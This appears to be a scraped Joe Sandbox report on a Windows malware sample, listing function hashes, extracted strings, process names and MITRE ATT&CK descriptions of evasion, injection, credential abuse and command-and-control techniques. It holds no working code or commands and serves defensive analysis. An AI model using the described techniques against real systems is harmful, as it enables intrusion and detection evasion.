Instruction ID: 98f3bd35f4e6aa2b22e6379ad947b4c13edc460e3e903b4c2eeea78c00358802
Opcode Fuzzy Hash: 9cfa67a3a9f49b6c25e869823f5603c425669158b91dde1126469d52b691bdfe
Instruction Fuzzy Hash: 54112971E116199BDB48CFABD94069EFBFBBBC8210F14C03AE518A7254DB705A018F51

Function 06D33C80 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88458f74e00eb230448937cca7d6c8f1d10fe83cd6c88bc686168308ac468a8
Instruction ID: 44057bb786e1b4c5623574c6b37ab12672e90538782aeb7d4aaf1403217b6d25
Opcode Fuzzy Hash: b88458f74e00eb230448937cca7d6c8f1d10fe83cd6c88bc686168308ac468a8
Instruction Fuzzy Hash: F91129B1E106299BDB58CFAAD94069EFBF7EFC8310F14C07AD508A7214DA305A118F51

Function 06D36800 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d23425ae970231a47003bb73521a8993e07858db79cc22c902dac6e511336f8
Instruction ID: 505d8205521b5a0823137a506c75e6406774e16760ec6e0bcf4ee84b98498240
Opcode Fuzzy Hash: 1d23425ae970231a47003bb73521a8993e07858db79cc22c902dac6e511336f8
Instruction Fuzzy Hash: 73112971E116299BDB48CFAAD9406EEFBF7AFC9210F14C03AD508A7254DB309A418F91

Function 06D32F88 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 292d3326357b400bcddd5d4ffc248f700d1be6927fa8dc338382ca190d0fd5d4
Instruction ID: e547d54ab76e945e1e419cde2172f7cccff2fd960bea6ee34407b27704fcc51e
Opcode Fuzzy Hash: 292d3326357b400bcddd5d4ffc248f700d1be6927fa8dc338382ca190d0fd5d4
Instruction Fuzzy Hash: 32111771E116299BDB58CFABD9406EEFBF7ABC8300F14C03AD518A7214DA305A018F94

Function 06D38488 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3f13ceb3efe3aa6d590379e5040cbdad0a079f9bd119cde87faef388388025
Instruction ID: 8805823e013f66186a2278bae0e17e7b6f3d7aaafb93bcb2bd677c9538f2a001
Opcode Fuzzy Hash: 4f3f13ceb3efe3aa6d590379e5040cbdad0a079f9bd119cde87faef388388025
Instruction Fuzzy Hash: FF216AB0E116199FDB48CFABD94469EFBF7AFC9200F14C07AD418A7254EA704A46CF61

Function 06D367FF Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1350ce868d266f3ca0afed99ac84b447d41f3bcf340cab089f7bde4de44e2cec
Instruction ID: fd06abf62c0532d1cb52358a290d97d742c5222ba5ddc02e101c13f1c675b908
Opcode Fuzzy Hash: 1350ce868d266f3ca0afed99ac84b447d41f3bcf340cab089f7bde4de44e2cec
Instruction Fuzzy Hash: 141128B0E116189BDB58CFABD94069EFAF7AFC9200F14C03AD508A6354DB708A418F91

Function 06D32F82 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625599907.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56639e8b29025eb1fa64cac4ab923c69a1968974c7a07ad02c8b2d837ea911b2
Instruction ID: 0b7b3a565ecb8b38c28d88a60200725b2593d90754345ee86835f022d83ee403
Opcode Fuzzy Hash: 56639e8b29025eb1fa64cac4ab923c69a1968974c7a07ad02c8b2d837ea911b2
Instruction Fuzzy Hash: B0113DB1E116199BDB58CFABD9406AEFAF3AFC9300F14C07AD508B7314EA704A018F95

Function 011B5718 Relevance: 6.5, Strings: 5, Instructions: 254COMMON

Download Yara Rule

Strings

LRq, xrefs: 011B5A48
LRq, xrefs: 011B594E
$q, xrefs: 011B57EC
$q, xrefs: 011B5A85
$q, xrefs: 011B5ABA

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: LRq$LRq$$q$$q$$q
API String ID: 0-947498194
Opcode ID: 9eb6c3f8e723b3d7c3ea1db8cb589375aeafe2b0f360f952905d0b71200c1fff
Instruction ID: 37d4e595a3431511dde1060de9da6362e18c303ce90c85627198754bfe396e26
Opcode Fuzzy Hash: 9eb6c3f8e723b3d7c3ea1db8cb589375aeafe2b0f360f952905d0b71200c1fff
Instruction Fuzzy Hash: 05A16F74E00218CFDB58DBA9D4C1AEDB7B2FB88710F698169E416BB345D730AC42CB91

Function 011BE400 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 011BE432
\;q, xrefs: 011BE416
\;q, xrefs: 011BE43E
\;q, xrefs: 011BE40C

Memory Dump Source

Source File: 00000000.00000002.1613424993.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11b0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 9de20e7cccc9e42cdb13a8e76d33e20482e9abfbf5b3a7f33e0e4d72b4331890
Instruction ID: 86f374c99ef9f37e30606f4c25f570f7b924c42746c4da6298461aab1165aee1
Opcode Fuzzy Hash: 9de20e7cccc9e42cdb13a8e76d33e20482e9abfbf5b3a7f33e0e4d72b4331890
Instruction Fuzzy Hash: 660184317511148FC72D8A2DC4C0AE677E6AF886A471941A9E902CB371DB34EC418791

Analysis Process: InstallUtil.exePID: 7628, Parent PID: 5768COMMON

Executed Functions

Function 00681570 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

$nc, xrefs: 0068158F

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID: $nc
API String ID: 0-4022354405
Opcode ID: 2d54677443f196bcf6e22c164ac18db286aa97d79aadbf4c5fc8ccfb7b0d0d6a
Instruction ID: f2dfc0195116473f7c06f958b4cdfd1c11dc23b95aff8ce4785fcd1e01bae045
Opcode Fuzzy Hash: 2d54677443f196bcf6e22c164ac18db286aa97d79aadbf4c5fc8ccfb7b0d0d6a
Instruction Fuzzy Hash: F5F0F6316047505FC3236378A4115AE3FA75EC225131885BFE40ACF391EF155D0687E6

Function 00681648 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00348489864c45a3ad54aa7e2ceeab55f56d522faa661f674d264123db720e7e
Instruction ID: c06fefb9877894946a97507eab70c3633826eea0b85e67045f72d996c8df3117
Opcode Fuzzy Hash: 00348489864c45a3ad54aa7e2ceeab55f56d522faa661f674d264123db720e7e
Instruction Fuzzy Hash: 29416D34A002088FCB55EB78D454BAEBBF7BF89310F248669D415AB356CB31EC42CB91

Function 00681658 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443e5dfbfae4449010ccf4461e22ff183a1fa241a2488fb3e66daef72bd72bed
Instruction ID: e4c524fb478cfc7b390849e07756fb675edbd621640a31849d0c82be172e384d
Opcode Fuzzy Hash: 443e5dfbfae4449010ccf4461e22ff183a1fa241a2488fb3e66daef72bd72bed
Instruction Fuzzy Hash: EC415C34B002088FDB54EB68D554BAEBBF7BF89310F248669D415AB355CB31EC42CB91

Function 00680808 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f776f4fe3a9541f65caf3481f9b6e8e12a9634b1111c653984607c68fb0cad0
Instruction ID: 037d7265010a6e0f522a61dbb874a1a2a7329380be7005582101b16651d9ba24
Opcode Fuzzy Hash: 6f776f4fe3a9541f65caf3481f9b6e8e12a9634b1111c653984607c68fb0cad0
Instruction Fuzzy Hash: 08216DB1D18215DBFF95BB3044983B93B639F65325F240F4AC1419B296CA20890EC7D6

Function 006808DD Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5e0e3d79dc43df681b061e21a93355bf70eabf867407aa5ba2001aa94e0e7d
Instruction ID: e7de4b45cc2c7a905fec1717ca4575103d5e989e87fa1e06359b616c95080f8f
Opcode Fuzzy Hash: 8c5e0e3d79dc43df681b061e21a93355bf70eabf867407aa5ba2001aa94e0e7d
Instruction Fuzzy Hash: 56218E70B40114CFEB94FB68C46477E36A3BB88700F204A29E102EB3A2CF348D4687D6

Function 006808E6 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ad67241ba84a1ea85e17ccb817c3e9d1a31ad9b675b2f857d64f017036755c
Instruction ID: c2af34dc27f667e7c0b949d59622e56581ef07eae5aad87167a817f6be75039d
Opcode Fuzzy Hash: 47ad67241ba84a1ea85e17ccb817c3e9d1a31ad9b675b2f857d64f017036755c
Instruction Fuzzy Hash: 52116070B40114CFEB94FB75D46466E76A3BB84700F204A69E502EB3A6CF349D4687D6

Function 006808F9 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a31c6b781fb70c11ce0d85ca4e33ee4b82d15fe24f7ecd7c705f155823ee21a
Instruction ID: a54779b0b4e2425163dcbcf5adc1cb40cb1dd06f0b2f4b2d97d425edb347f59a
Opcode Fuzzy Hash: 2a31c6b781fb70c11ce0d85ca4e33ee4b82d15fe24f7ecd7c705f155823ee21a
Instruction Fuzzy Hash: EF118E70B40114CFEB94FB79C06476E36A3BB88700F204A29E502EB3A2CF348D4687D6

Function 00680848 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48719d12e84a451e0b378ad7c9029f5feabeca92282438f8d39d5e841c7059e8
Instruction ID: c9051371003a14e6e6d2f1c0c05b8d87644011afc88174f858619686996bcc12
Opcode Fuzzy Hash: 48719d12e84a451e0b378ad7c9029f5feabeca92282438f8d39d5e841c7059e8
Instruction Fuzzy Hash: 9F017570B001148BEF94BB74C8597AE76B3AF88700F200A29E502B7391CF345C458BD1

Function 00680957 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2494689229.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d266f7aac389916a29d50f1a738ec43f5fdd6e2f3ce93df48ab9493ae7dde3e
Instruction ID: 3829de22ba6fb952c71f798444d8fd853a0deaae98659c38ee9597fd7b09db9b
Opcode Fuzzy Hash: 0d266f7aac389916a29d50f1a738ec43f5fdd6e2f3ce93df48ab9493ae7dde3e
Instruction Fuzzy Hash: C5F03170B50114CBEFD4FB64C45476E76A3BB88704F340A19E542AB391CF744D4A97D6

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Function 063B8320 Relevance: 11.0, Strings: 8, Instructions: 954
COMMON

Function 06B00040 Relevance: 5.5, Instructions: 5545
COMMON

Function 06B0003F Relevance: 5.5, Instructions: 5543
COMMON

Function 06A70040 Relevance: 5.2, Instructions: 5226
COMMON

Function 011B5388 Relevance: 17.6, Strings: 14, Instructions: 118
COMMON

Function 011BAAA0 Relevance: 12.7, Strings: 10, Instructions: 182
COMMON

Function 011B4D58 Relevance: 11.5, Strings: 9, Instructions: 268
COMMON

Function 011BAA92 Relevance: 11.4, Strings: 9, Instructions: 163
COMMON

Function 011B9DBA Relevance: 7.8, Strings: 6, Instructions: 297
COMMON

Function 011B9410 Relevance: 6.5, Strings: 5, Instructions: 274
COMMON

Function 014EA791 Relevance: 6.1, APIs: 4, Instructions: 137
threadCOMMON

Function 014EA7A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON